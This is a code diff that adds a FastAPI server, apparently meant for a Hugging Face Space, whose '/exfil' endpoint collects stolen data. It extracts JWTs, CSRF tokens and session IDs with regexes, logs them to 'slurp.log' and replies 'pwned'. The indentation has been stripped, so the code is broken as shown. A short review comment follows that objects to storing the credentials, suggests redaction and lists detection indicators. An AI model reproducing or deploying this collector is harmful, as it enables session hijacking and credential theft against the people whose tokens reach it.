Create app.py
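--- a/app.py
+++ b/app.py
@@ -0,0 +1,37 @@
+# app.py — HuggingFace App Space listener
+from fastapi import FastAPI, Request
+from datetime import datetime
+import json, re
+
+app = FastAPI()
+LOGFILE = "slurp.log"
+
+def mark(loot):
+text = json.dumps(loot)
+return {
+"jwt": re.findall(r'eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+', text),
+"csrf": re.findall(r'csrf[_\-]?token[\'"]?\s*[:=]\s*[\'"]?([a-zA-Z0-9\-_]{8,})', text, re.I),
+"sid": re.findall(r'session(?:id)?=([a-zA-Z0-9\-_.]{10,})', text, re.I)
+}
+
+@app.post("/exfil")
+async def exfil(request: Request):
+try:
+data = await request.json()
+except:
+return {"error": "bad json"}
+
+log = {
+"timestamp": datetime.utcnow().isoformat(),
+"ip": request.headers.get("x-forwarded-for", "unknown"),
+"ua": request.headers.get("user-agent", "unknown"),
+"loot": data,
+"marks": mark(data)
+}
+
+with open(LOGFILE, "a") as f:
+f.write(json.dumps(log, indent=2) + ",\n")
+
+print(f"\n[YEET] {log['ip']} @ {log['timestamp']}")
+print(json.dumps(log["marks"], indent=2))
+return {"status": "pwned", "marks": log["marks"]}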
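Review bot: The `exfil` handler keeps every JWT-, CSRF-token- and session-id-shaped string that `mark` finds in an unauthenticated POST body, plus the raw body itself, in cleartext in `slurp.log`, on stdout and in the HTTP response, with no redaction, access control or retention limit on what are live session credentials. If this is a collector for an authorised test, the record should hold match counts only, e.g. `"marks": {k: len(v) for k, v in mark(data).items()}` with the `"loot": data` field dropped, and the header comment should state the engagement scope; nothing in the file shows one. For detection, the fixed strings here serve as indicators: JSON POSTs to the path `/exfil`, a response containing `"status": "pwned"`, and the log name `slurp.log`. Any token that has reached this endpoint should be treated as compromised and revoked.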